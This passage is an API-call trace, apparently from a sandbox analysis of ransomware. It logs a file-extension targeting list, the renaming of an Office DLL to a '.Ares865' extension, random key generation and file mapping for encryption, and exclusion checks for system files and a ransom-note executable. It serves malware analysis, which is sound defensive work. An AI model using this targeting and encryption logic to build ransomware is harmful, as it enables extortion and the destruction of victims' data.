(lpString="zip") returned 3 [0086.680] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0086.680] lstrlenW (lpString="tgz") returned 3 [0086.680] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0086.680] lstrlenW (lpString="vbox") returned 4 [0086.680] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0086.681] lstrlenW (lpString="vdi") returned 3 [0086.681] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0086.681] lstrlenW (lpString="vhd") returned 3 [0086.681] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0086.681] lstrlenW (lpString="vhdx") returned 4 [0086.681] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0086.681] lstrlenW (lpString="avhd") returned 4 [0086.681] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0086.681] lstrlenW (lpString="db") returned 2 [0086.681] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0086.681] lstrlenW (lpString="db2") returned 3 [0086.681] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0086.681] lstrlenW (lpString="db3") returned 3 [0086.681] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0086.681] lstrlenW (lpString="dbf") returned 3 [0086.681] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0086.681] lstrlenW (lpString="mdf") returned 3 [0086.681] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0086.681] lstrlenW (lpString="mdb") returned 3 [0086.681] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0086.681] lstrlenW (lpString="sql") returned 3 [0086.681] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0086.681] lstrlenW (lpString="sqlite") returned 6 [0086.681] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0086.681] lstrlenW (lpString="sqlite3") returned 7 [0086.681] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0086.681] lstrlenW (lpString="sqlitedb") returned 8 [0086.681] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0086.681] lstrlenW (lpString="xml") returned 3 [0086.681] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0086.681] lstrlenW (lpString="$er") returned 3 [0086.681] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0086.681] lstrlenW (lpString="4dd") returned 3 [0086.681] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0086.681] lstrlenW (lpString="4dl") returned 3 [0086.681] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0086.682] lstrlenW (lpString="^^^") returned 3 [0086.682] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0086.682] lstrlenW (lpString="abs") returned 3 [0086.682] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0086.682] lstrlenW (lpString="abx") returned 3 [0086.682] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0086.682] lstrlenW (lpString="accdb") returned 5 [0086.682] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0086.682] lstrlenW (lpString="accdc") returned 5 [0086.682] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0086.682] lstrlenW (lpString="accde") returned 5 [0086.682] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0086.682] lstrlenW (lpString="accdr") returned 5 [0086.682] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0086.682] lstrlenW (lpString="accdt") returned 5 [0086.682] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0086.682] lstrlenW (lpString="accdw") returned 5 [0086.682] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0086.682] lstrlenW (lpString="accft") returned 5 [0086.682] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0086.682] lstrlenW (lpString="adb") returned 3 [0086.682] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.682] lstrlenW (lpString="adb") returned 3 [0086.682] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.682] lstrlenW (lpString="ade") returned 3 [0086.682] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0086.682] lstrlenW (lpString="adf") returned 3 [0086.682] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0086.682] lstrlenW (lpString="adn") returned 3 [0086.682] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0086.682] lstrlenW (lpString="adp") returned 3 [0086.682] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0086.682] lstrlenW (lpString="alf") returned 3 [0086.682] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0086.682] lstrlenW (lpString="ask") returned 3 [0086.682] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0086.683] lstrlenW (lpString="btr") returned 3 [0086.683] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0086.683] lstrlenW (lpString="cat") returned 3 [0086.683] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0086.683] lstrlenW (lpString="cdb") returned 3 [0086.683] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0086.683] lstrlenW (lpString="ckp") returned 3 [0086.683] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0086.683] lstrlenW (lpString="cma") returned 3 [0086.683] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0086.683] lstrlenW (lpString="cpd") returned 3 [0086.683] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0086.683] lstrlenW (lpString="dacpac") returned 6 [0086.683] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0086.683] lstrlenW (lpString="dad") returned 3 [0086.683] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0086.683] lstrlenW (lpString="dadiagrams") returned 10 [0086.683] lstrcmpiW (lpString1="LL.trx_dll", lpString2="dadiagrams") returned 1 [0086.683] lstrlenW (lpString="daschema") returned 8 [0086.683] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0086.683] lstrlenW (lpString="db-journal") returned 10 [0086.683] lstrcmpiW (lpString1="LL.trx_dll", lpString2="db-journal") returned 1 [0086.683] lstrlenW (lpString="db-shm") returned 6 [0086.683] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0086.683] lstrlenW (lpString="db-wal") returned 6 [0086.683] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0086.683] lstrlenW (lpString="dbc") returned 3 [0086.683] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0086.683] lstrlenW (lpString="dbs") returned 3 [0086.683] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0086.683] lstrlenW (lpString="dbt") returned 3 [0086.683] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0086.683] lstrlenW (lpString="dbv") returned 3 [0086.684] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0086.684] lstrlenW (lpString="dbx") returned 3 [0086.684] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0086.684] lstrlenW (lpString="dcb") returned 3 [0086.684] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0086.684] lstrlenW (lpString="dct") returned 3 [0086.684] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0086.684] lstrlenW (lpString="dcx") returned 3 [0086.684] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0086.684] lstrlenW (lpString="ddl") returned 3 [0086.684] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0086.684] lstrlenW (lpString="dlis") returned 4 [0086.684] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0086.684] lstrlenW (lpString="dp1") returned 3 [0086.684] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0086.684] lstrlenW (lpString="dqy") returned 3 [0086.684] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0086.684] lstrlenW (lpString="dsk") returned 3 [0086.684] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0086.684] lstrlenW (lpString="dsn") returned 3 [0086.684] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0086.684] lstrlenW (lpString="dtsx") returned 4 [0086.684] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0086.684] lstrlenW (lpString="dxl") returned 3 [0086.684] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0086.684] lstrlenW (lpString="eco") returned 3 [0086.684] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0086.684] lstrlenW (lpString="ecx") returned 3 [0086.684] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0086.684] lstrlenW (lpString="edb") returned 3 [0086.684] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0086.684] lstrlenW (lpString="epim") returned 4 [0086.684] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0086.684] lstrlenW (lpString="fcd") returned 3 [0086.684] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0086.684] lstrlenW (lpString="fdb") returned 3 [0086.684] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0086.685] lstrlenW (lpString="fic") returned 3 [0086.685] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0086.685] lstrlenW (lpString="flexolibrary") returned 12 [0086.685] lstrcmpiW (lpString1=".DLL.trx_dll", lpString2="flexolibrary") returned -1 [0086.685] lstrlenW (lpString="fm5") returned 3 [0086.685] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0086.685] lstrlenW (lpString="fmp") returned 3 [0086.685] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0086.685] lstrlenW (lpString="fmp12") returned 5 [0086.685] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0086.685] lstrlenW (lpString="fmpsl") returned 5 [0086.685] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0086.685] lstrlenW (lpString="fol") returned 3 [0086.685] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0086.685] lstrlenW (lpString="fp3") returned 3 [0086.685] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0086.685] lstrlenW (lpString="fp4") returned 3 [0086.685] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0086.685] lstrlenW (lpString="fp5") returned 3 [0086.685] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0086.685] lstrlenW (lpString="fp7") returned 3 [0086.685] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0086.685] lstrlenW (lpString="fpt") returned 3 [0086.685] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0086.685] lstrlenW (lpString="frm") returned 3 [0086.685] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0086.685] lstrlenW (lpString="gdb") returned 3 [0086.685] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.685] lstrlenW (lpString="gdb") returned 3 [0086.685] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.685] lstrlenW (lpString="grdb") returned 4 [0086.685] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0086.685] lstrlenW (lpString="gwi") returned 3 [0086.685] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0086.685] lstrlenW (lpString="hdb") returned 3 [0086.685] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0086.686] lstrlenW (lpString="his") returned 3 [0086.686] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0086.686] lstrlenW (lpString="ib") returned 2 [0086.686] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0086.686] lstrlenW (lpString="idb") returned 3 [0086.686] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0086.686] lstrlenW (lpString="ihx") returned 3 [0086.686] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0086.686] lstrlenW (lpString="itdb") returned 4 [0086.686] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0086.686] lstrlenW (lpString="itw") returned 3 [0086.686] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0086.686] lstrlenW (lpString="jet") returned 3 [0086.686] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0086.686] lstrlenW (lpString="jtx") returned 3 [0086.686] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0086.686] lstrlenW (lpString="kdb") returned 3 [0086.686] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0086.686] lstrlenW (lpString="kexi") returned 4 [0086.686] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0086.686] lstrlenW (lpString="kexic") returned 5 [0086.686] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0086.686] lstrlenW (lpString="kexis") returned 5 [0086.686] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0086.686] lstrlenW (lpString="lgc") returned 3 [0086.686] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0086.686] lstrlenW (lpString="lwx") returned 3 [0086.686] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0086.686] lstrlenW (lpString="maf") returned 3 [0086.686] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0086.686] lstrlenW (lpString="maq") returned 3 [0086.686] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0086.686] lstrlenW (lpString="mar") returned 3 [0086.686] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0086.686] lstrlenW (lpString="marshal") returned 7 [0086.686] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0086.687] lstrlenW (lpString="mas") returned 3 [0086.687] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0086.687] lstrlenW (lpString="mav") returned 3 [0086.687] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0086.687] lstrlenW (lpString="maw") returned 3 [0086.687] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0086.687] lstrlenW (lpString="mdbhtml") returned 7 [0086.687] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0086.687] lstrlenW (lpString="mdn") returned 3 [0086.687] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0086.687] lstrlenW (lpString="mdt") returned 3 [0086.687] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0086.687] lstrlenW (lpString="mfd") returned 3 [0086.687] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0086.687] lstrlenW (lpString="mpd") returned 3 [0086.687] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0086.687] lstrlenW (lpString="mrg") returned 3 [0086.687] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0086.687] lstrlenW (lpString="mud") returned 3 [0086.687] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0086.687] lstrlenW (lpString="mwb") returned 3 [0086.687] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0086.687] lstrlenW (lpString="myd") returned 3 [0086.687] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0086.687] lstrlenW (lpString="ndf") returned 3 [0086.687] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0086.687] lstrlenW (lpString="nnt") returned 3 [0086.687] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0086.687] lstrlenW (lpString="nrmlib") returned 6 [0086.687] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0086.687] lstrlenW (lpString="ns2") returned 3 [0086.687] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0086.687] lstrlenW (lpString="ns3") returned 3 [0086.687] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0086.687] lstrlenW (lpString="ns4") returned 3 [0086.687] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0086.687] lstrlenW (lpString="nsf") returned 3 [0086.688] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0086.688] lstrlenW (lpString="nv") returned 2 [0086.688] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0086.688] lstrlenW (lpString="nv2") returned 3 [0086.688] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0086.688] lstrlenW (lpString="nwdb") returned 4 [0086.688] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0086.688] lstrlenW (lpString="nyf") returned 3 [0086.688] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0086.688] lstrlenW (lpString="odb") returned 3 [0086.688] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.688] lstrlenW (lpString="odb") returned 3 [0086.688] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.688] lstrlenW (lpString="oqy") returned 3 [0086.688] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0086.688] lstrlenW (lpString="ora") returned 3 [0086.688] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0086.688] lstrlenW (lpString="orx") returned 3 [0086.688] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0086.688] lstrlenW (lpString="owc") returned 3 [0086.688] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0086.688] lstrlenW (lpString="p96") returned 3 [0086.688] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0086.688] lstrlenW (lpString="p97") returned 3 [0086.688] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0086.688] lstrlenW (lpString="pan") returned 3 [0086.688] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0086.688] lstrlenW (lpString="pdb") returned 3 [0086.688] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0086.688] lstrlenW (lpString="pdm") returned 3 [0086.688] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0086.688] lstrlenW (lpString="pnz") returned 3 [0086.688] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0086.688] lstrlenW (lpString="qry") returned 3 [0086.688] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0086.688] lstrlenW (lpString="qvd") returned 3 [0086.688] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0086.689] lstrlenW (lpString="rbf") returned 3 [0086.689] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0086.689] lstrlenW (lpString="rctd") returned 4 [0086.689] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0086.689] lstrlenW (lpString="rod") returned 3 [0086.689] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0086.689] lstrlenW (lpString="rodx") returned 4 [0086.689] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0086.689] lstrlenW (lpString="rpd") returned 3 [0086.689] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0086.689] lstrlenW (lpString="rsd") returned 3 [0086.689] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0086.689] lstrlenW (lpString="sas7bdat") returned 8 [0086.689] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0086.689] lstrlenW (lpString="sbf") returned 3 [0086.689] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0086.689] lstrlenW (lpString="scx") returned 3 [0086.689] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0086.689] lstrlenW (lpString="sdb") returned 3 [0086.689] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0086.689] lstrlenW (lpString="sdc") returned 3 [0086.689] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0086.689] lstrlenW (lpString="sdf") returned 3 [0086.689] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0086.689] lstrlenW (lpString="sis") returned 3 [0086.689] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0086.689] lstrlenW (lpString="spq") returned 3 [0086.689] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0086.689] lstrlenW (lpString="te") returned 2 [0086.689] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0086.689] lstrlenW (lpString="teacher") returned 7 [0086.689] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0086.689] lstrlenW (lpString="tmd") returned 3 [0086.689] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0086.689] lstrlenW (lpString="tps") returned 3 [0086.689] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0086.690] lstrlenW (lpString="trc") returned 3 [0086.690] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.690] lstrlenW (lpString="trc") returned 3 [0086.690] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.690] lstrlenW (lpString="trm") returned 3 [0086.690] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0086.690] lstrlenW (lpString="udb") returned 3 [0086.690] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0086.690] lstrlenW (lpString="udl") returned 3 [0086.690] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0086.690] lstrlenW (lpString="usr") returned 3 [0086.690] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0086.690] lstrlenW (lpString="v12") returned 3 [0086.690] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0086.690] lstrlenW (lpString="vis") returned 3 [0086.690] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0086.690] lstrlenW (lpString="vpd") returned 3 [0086.690] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0086.690] lstrlenW (lpString="vvv") returned 3 [0086.690] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0086.690] lstrlenW (lpString="wdb") returned 3 [0086.690] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0086.690] lstrlenW (lpString="wmdb") returned 4 [0086.690] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0086.690] lstrlenW (lpString="wrk") returned 3 [0086.690] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0086.690] lstrlenW (lpString="xdb") returned 3 [0086.690] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0086.690] lstrlenW (lpString="xld") returned 3 [0086.690] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0086.690] lstrlenW (lpString="xmlff") returned 5 [0086.690] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0086.690] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll.Ares865") returned 80 [0086.690] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\pub6intl.dll.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\pub6intl.dll.trx_dll.ares865"), dwFlags=0x1) returned 1 [0086.695] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\pub6intl.dll.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0086.695] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=107872) returned 1 [0086.695] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0086.695] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0086.695] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0086.695] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0086.696] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0086.696] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.696] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1a860, lpName=0x0) returned 0x15c [0086.698] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1a860) returned 0x190000 [0086.711] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0086.712] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0086.712] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.712] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0086.712] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0086.712] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0086.712] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0086.712] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0086.712] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0086.712] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0086.712] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0086.712] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0086.712] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0086.712] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0086.713] CloseHandle (hObject=0x15c) returned 1 [0086.713] CloseHandle (hObject=0x118) returned 1 [0086.713] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0086.713] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0086.713] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0086.714] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x57655500, ftCreationTime.dwHighDateTime=0x1cac809, ftLastAccessTime.dwLowDateTime=0xef0320d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x57655500, ftLastWriteTime.dwHighDateTime=0x1cac809, nFileSizeHigh=0x0, nFileSizeLow=0x87f60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PUB6INTL.REST.trx_dll", cAlternateFileName="PUB6IN~2.TRX")) returned 1 [0086.714] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0086.714] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="aoldtz.exe") returned 1 [0086.714] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2=".") returned 1 [0086.714] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="..") returned 1 [0086.714] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="windows") returned -1 [0086.714] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="bootmgr") returned 1 [0086.714] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="temp") returned -1 [0086.714] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="pagefile.sys") returned 1 [0086.714] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="boot") returned 1 [0086.714] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="ids.txt") returned 1 [0086.714] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="ntuser.dat") returned 1 [0086.715] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="perflogs") returned 1 [0086.715] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="MSBuild") returned 1 [0086.715] lstrlenW (lpString="PUB6INTL.REST.trx_dll") returned 21 [0086.715] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll") returned 72 [0086.715] lstrcpyW (in: lpString1=0x2cce468, 